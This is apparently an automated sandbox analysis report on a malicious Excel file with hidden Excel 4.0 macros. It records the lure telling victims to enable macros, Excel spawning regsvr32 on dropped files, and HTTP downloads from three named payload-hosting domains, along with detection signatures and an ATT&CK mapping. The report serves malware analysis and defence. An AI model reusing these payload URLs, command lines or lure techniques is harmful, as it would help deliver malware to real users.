Loading ...

Play interactive tourEdit tour

Windows Analysis Report protocol.xls

Overview

General Information

Sample Name:protocol.xls
Analysis ID:510734
MD5:93383a84bdf0f5ff68b3bb6e30bcd2bb
SHA1:455bb88e45935daa21c2bf86e2b48da0d7627025
SHA256:ca641647b3e2102c7b8f0075f46d1e52618f9b597d4e5ca338dcfec8f1210c59
Tags:xls
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for domain / URL
Sigma detected: Regsvr32 Command Line Without DLL
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 196 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2632 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2792 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2128 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
protocol.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x126aa:$s1: Excel
  • 0x1378f:$s1: Excel
  • 0x3610:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
protocol.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\protocol.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
    • 0x0:$header_docf: D0 CF 11 E0
    • 0x126aa:$s1: Excel
    • 0x1378f:$s1: Excel
    • 0x3610:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
    C:\Users\user\Desktop\protocol.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Regsvr32 Command Line Without DLLShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 196, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, ProcessId: 2632
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 196, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, ProcessId: 2632

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for domain / URLShow sources
      Source: atochagaleria.com.arVirustotal: Detection: 5%Perma Link
      Source: https://atochagaleria.com.ar/CnijALAyxR/l.htmlVirustotal: Detection: 8%Perma Link
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: unknownHTTPS traffic detected: 199.79.62.121:443 -> 192.168.2.22:49165 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 162.241.2.103:443 -> 192.168.2.22:49166 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 192.99.46.215:443 -> 192.168.2.22:49167 version: TLS 1.2

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 199.79.62.121:443
      Source: global trafficDNS query: name: maberic.com
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 199.79.62.121:443
      Source: global trafficHTTP traffic detected: GET /3XRJdBEjFc/l.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: maberic.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /toXuNS00/l.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ost.net.brConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /CnijALAyxR/l.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: atochagaleria.com.arConnection: Keep-Alive
      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: Joe Sandbox ViewIP Address: 162.241.2.103 162.241.2.103
      Source: Joe Sandbox ViewIP Address: 199.79.62.121 199.79.62.121
      Source: Joe Sandbox ViewIP Address: 192.99.46.215 192.99.46.215
      Source: Joe Sandbox ViewIP Address: 192.99.46.215 192.99.46.215
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
      Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
      Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
      Source: regsvr32.exe, 00000003.00000002.479605737.0000000004930000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.418341066.0000000004A20000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437751043.0000000004A00000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: regsvr32.exe, 00000003.00000002.479605737.0000000004930000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.418341066.0000000004A20000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437751043.0000000004A00000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
      Source: regsvr32.exe, 00000003.00000002.479605737.0000000004930000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.418341066.0000000004A20000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437751043.0000000004A00000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
      Source: regsvr32.exe, 00000003.00000002.479805319.0000000004B17000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.418553608.0000000004C07000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437972841.0000000004BE7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: regsvr32.exe, 00000003.00000002.479805319.0000000004B17000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.418553608.0000000004C07000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437972841.0000000004BE7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: regsvr32.exe, 00000003.00000002.478982163.0000000003A50000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.417826349.0000000003A90000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437307506.0000000003B50000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: regsvr32.exe, 00000003.00000002.478519739.0000000001CF0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.417140557.0000000001CC0000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.436860950.0000000001E20000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: regsvr32.exe, 00000003.00000002.479805319.0000000004B17000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.418553608.0000000004C07000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437972841.0000000004BE7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: regsvr32.exe, 00000003.00000002.479805319.0000000004B17000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.418553608.0000000004C07000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437972841.0000000004BE7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: regsvr32.exe, 00000003.00000002.478982163.0000000003A50000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.417826349.0000000003A90000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437307506.0000000003B50000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
      Source: regsvr32.exe, 00000003.00000002.479605737.0000000004930000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.418341066.0000000004A20000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437751043.0000000004A00000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: regsvr32.exe, 00000003.00000002.479805319.0000000004B17000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.418553608.0000000004C07000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437972841.0000000004BE7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: regsvr32.exe, 00000003.00000002.479605737.0000000004930000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.418341066.0000000004A20000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437751043.0000000004A00000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: regsvr32.exe, 00000005.00000002.437751043.0000000004A00000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\l[1].htmJump to behavior
      Source: unknownDNS traffic detected: queries for: maberic.com
      Source: global trafficHTTP traffic detected: GET /3XRJdBEjFc/l.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: maberic.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /toXuNS00/l.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ost.net.brConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /CnijALAyxR/l.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: atochagaleria.com.arConnection: Keep-Alive
      Source: unknownHTTPS traffic detected: 199.79.62.121:443 -> 192.168.2.22:49165 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 162.241.2.103:443 -> 192.168.2.22:49166 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 192.99.46.215:443 -> 192.168.2.22:49167 version: TLS 1.2

      System Summary:

      barindex
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 4Screenshot OCR: Enable Editing 18 '9 41' I 20 (D PROTECTED VIEW Be careful- files from the 1nterne ,cted View.
      Source: Screenshot number: 4Screenshot OCR: Enable Content 25 26 Q) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 30
      Source: Screenshot number: 8Screenshot OCR: Enable Editing 18 '9 41' I 20 (D PROTECTED VIEW Be careful- files from the 1nterne ,cted View.
      Source: Screenshot number: 8Screenshot OCR: Enable Content 25 26 Q) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 30
      Source: Screenshot number: 12Screenshot OCR: Enable Editing 18 '9 41' I 20 (D PROTECTED VIEW Be careful- files from the 1nterne ,cted View.
      Source: Screenshot number: 12Screenshot OCR: Enable Content 25 26 Q) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 30
      Source: Document image extraction number: 0Screenshot OCR: Enable Editing CD PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
      Source: Document image extraction number: 0Screenshot OCR: Enable Content Q) SECURITY WARNING Macros have been disabled. Enable Content om If you are using a
      Source: Document image extraction number: 1Screenshot OCR: Enable Editing (D PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unk$$ yo
      Source: Document image extraction number: 1Screenshot OCR: Enable Content )SECURITY WARNING Macros have been disabled. Enable Content om If you are using a
      Source: Screenshot number: 16Screenshot OCR: Enable Editing 18 19 20 (D PROTECTED VIEW Be careful - files from the Internet can contain viruse
      Source: Screenshot number: 16Screenshot OCR: Enable Content 25 26 Q) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 30
      Source: Screenshot number: 20Screenshot OCR: Enable Editing 19 20 (D PROTECTED VIEW Be careful - files from the Internet can contain viruses. U
      Source: Screenshot number: 20Screenshot OCR: Enable Content 25 26 Q) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 30
      Source: protocol.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
      Source: C:\Users\user\Desktop\protocol.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
      Source: protocol.xlsOLE indicator, VBA macros: true
      Source: protocol.xls.0.drOLE indicator, VBA macros: true
      Source: CD1E.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: protocol.xlsOLE indicator, Workbook stream: true
      Source: protocol.xls.0.drOLE indicator, Workbook stream: true
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.testJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.testJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.testJump to behavior
      Source: protocol.xlsJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
      Source: regsvr32.exe, 00000003.00000002.479605737.0000000004930000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.418341066.0000000004A20000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437751043.0000000004A00000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD190.tmpJump to behavior
      Source: classification engineClassification label: mal76.expl.winXLS@7/4@3/3
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: CD1E.tmp.0.drInitial sample: OLE indicators vbamacros = False
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\regsvr32.exe TID: 2856Thread sleep count: 65 > 30Jump to behavior
      Source: C:\Windows\System32\regsvr32.exe TID: 2928Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\System32\regsvr32.exe TID: 2576Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\System32\regsvr32.exe TID: 2116Thread sleep count: 57 > 30Jump to behavior
      Source: C:\Windows\System32\regsvr32.exe TID: 292Thread sleep time: -60000s >= -30000sJump to behavior

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Yara detected hidden Macro 4.0 in ExcelShow sources
      Source: Yara matchFile source: protocol.xls, type: SAMPLE
      Source: Yara matchFile source: C:\Users\user\Desktop\protocol.xls, type: DROPPED

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsScripting1Path InterceptionProcess Injection1Disable or Modify Tools1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol13Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer2SIM Card SwapCarrier Billing Fraud

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      maberic.com2%VirustotalBrowse
      atochagaleria.com.ar5%VirustotalBrowse
      ost.net.br2%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      https://atochagaleria.com.ar/CnijALAyxR/l.html9%VirustotalBrowse
      https://atochagaleria.com.ar/CnijALAyxR/l.html0%Avira URL Cloudsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://servername/isapibackend.dll0%Avira URL Cloudsafe
      https://maberic.com/3XRJdBEjFc/l.html0%Avira URL Cloudsafe
      https://ost.net.br/toXuNS00/l.html0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      maberic.com
      199.79.62.121
      truefalseunknown
      atochagaleria.com.ar
      192.99.46.215
      truetrueunknown
      ost.net.br
      162.241.2.103
      truefalseunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://atochagaleria.com.ar/CnijALAyxR/l.htmltrue
      • 9%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://maberic.com/3XRJdBEjFc/l.htmlfalse
      • Avira URL Cloud: safe
      unknown
      https://ost.net.br/toXuNS00/l.htmlfalse
      • Avira URL Cloud: safe
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkregsvr32.exe, 00000003.00000002.479805319.0000000004B17000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.418553608.0000000004C07000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437972841.0000000004BE7000.00000002.00020000.sdmpfalse
        high
        http://www.windows.com/pctv.regsvr32.exe, 00000005.00000002.437751043.0000000004A00000.00000002.00020000.sdmpfalse
          high
          http://investor.msn.comregsvr32.exe, 00000003.00000002.479605737.0000000004930000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.418341066.0000000004A20000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437751043.0000000004A00000.00000002.00020000.sdmpfalse
            high
            http://www.msnbc.com/news/ticker.txtregsvr32.exe, 00000003.00000002.479605737.0000000004930000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.418341066.0000000004A20000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437751043.0000000004A00000.00000002.00020000.sdmpfalse
              high
              http://www.icra.org/vocabulary/.regsvr32.exe, 00000003.00000002.479805319.0000000004B17000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.418553608.0000000004C07000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437972841.0000000004BE7000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000003.00000002.478982163.0000000003A50000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.417826349.0000000003A90000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437307506.0000000003B50000.00000002.00020000.sdmpfalse
                high
                http://investor.msn.com/regsvr32.exe, 00000003.00000002.479605737.0000000004930000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.418341066.0000000004A20000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437751043.0000000004A00000.00000002.00020000.sdmpfalse
                  high
                  http://www.%s.comPAregsvr32.exe, 00000003.00000002.478982163.0000000003A50000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.417826349.0000000003A90000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437307506.0000000003B50000.00000002.00020000.sdmpfalse
                  • URL Reputation: safe
                  low
                  http://windowsmedia.com/redir/services.asp?WMPFriendly=trueregsvr32.exe, 00000003.00000002.479805319.0000000004B17000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.418553608.0000000004C07000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437972841.0000000004BE7000.00000002.00020000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.hotmail.com/oeregsvr32.exe, 00000003.00000002.479605737.0000000004930000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.418341066.0000000004A20000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437751043.0000000004A00000.00000002.00020000.sdmpfalse
                    high
                    http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.478519739.0000000001CF0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.417140557.0000000001CC0000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.436860950.0000000001E20000.00000002.00020000.sdmpfalse
                    • Avira URL Cloud: safe
                    low

                    Contacted IPs

                    • No. of IPs < 25%
